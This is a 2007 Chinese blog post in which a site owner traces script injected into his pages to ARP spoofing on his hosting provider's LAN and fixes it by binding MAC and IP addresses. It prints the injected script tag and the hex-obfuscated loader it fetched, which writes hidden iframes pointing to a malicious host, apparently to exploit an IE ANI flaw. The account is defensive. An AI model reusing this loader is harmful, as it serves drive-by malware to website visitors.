网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
JScript内置对象Array中元素的删除方法
Mar 08 Javascript
JavaScript初学者需要了解10个小技巧
Aug 25 Javascript
Javascript读取cookie函数代码
Oct 16 Javascript
HTML5之lang属性与dir属性的详解
Jun 19 Javascript
查询json的数据结构的8种方式简介
Mar 10 Javascript
JavaScript实现斗地主游戏的思路
Feb 29 Javascript
JavaScript 中 avalon绑定属性总结
Oct 19 Javascript
AngularJS ionic手势事件的使用总结
Aug 09 Javascript
VUE 3D轮播图封装实现方法
Jul 03 Javascript
在vue中多次调用同一个定义全局变量的实例
Sep 25 Javascript
简单了解微信小程序 e.target与e.currentTarget的不同
Sep 27 Javascript
vue获取data数据改变前后的值方法
Nov 07 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
PHP 安全检测代码片段(分享)
2013/07/05 PHP
PHP-FPM之Chroot执行环境详解
2015/08/03 PHP
解决laravel中日志权限莫名变成了root的问题
2019/10/17 PHP
thinkphp5 + ajax 使用formdata提交数据(包括文件上传) 后台返回json完整实例
2020/03/02 PHP
IE event.srcElement和FF event.target 功能比较
2010/03/01 Javascript
jquery ajax return没有返回值的解决方法
2011/10/20 Javascript
js日历功能对象
2012/01/12 Javascript
JS实现商品倒计时实现代码
2013/05/03 Javascript
js脚本获取webform服务器控件的方法
2014/05/16 Javascript
js实现有时间限制消失的图片方法
2015/02/27 Javascript
js带前后翻页的图片切换效果代码分享
2015/09/08 Javascript
AngularJS入门教程之数据绑定用法示例
2016/11/01 Javascript
Node.js发送HTTP客户端请求并显示响应结果的方法示例
2017/04/12 Javascript
微信小程序实现折叠与展开文章功能
2018/06/12 Javascript
Nodejs监控事件循环异常示例详解
2019/09/22 NodeJs
JS中类的静态方法,静态变量,实例方法,实例变量区别与用法实例分析
2020/03/14 Javascript
通过vue刷新左侧菜单栏操作
2020/08/06 Javascript
在DigitalOcean的服务器上部署flaskblog应用
2015/12/19 Python
Python selenium 父子、兄弟、相邻节点定位方式详解
2016/09/15 Python
python 迭代器和iter()函数详解及实例
2017/03/21 Python
Python设计模式之工厂模式简单示例
2018/01/09 Python
python jieba分词并统计词频后输出结果到Excel和txt文档方法
2018/02/11 Python
使用python对多个txt文件中的数据进行筛选的方法
2019/07/10 Python
使用numpngw和matplotlib生成png动画的示例代码
2021/01/24 Python
中国综合网上购物商城:苏宁易购
2016/08/09 全球购物
瑜伽服装品牌:露露柠檬(lululemon athletica)
2017/06/04 全球购物
英国IT硬件供应商,定制游戏PC:Mesh Computers
2019/03/28 全球购物
美国在线轮胎零售商:SimpleTire
2019/04/08 全球购物
c++工程师面试问题
2013/08/04 面试题
土木工程毕业生推荐信
2013/10/28 职场文书
路政管理专业推荐信
2013/11/11 职场文书
我们的节日端午节活动方案
2014/03/02 职场文书
公务员爱岗敬业演讲稿
2014/08/26 职场文书
六年级语文教学反思
2016/03/03 职场文书
离婚协议书范文2016
2016/03/18 职场文书
JavaScript最完整的深浅拷贝实现方式详解
2022/02/28 Javascript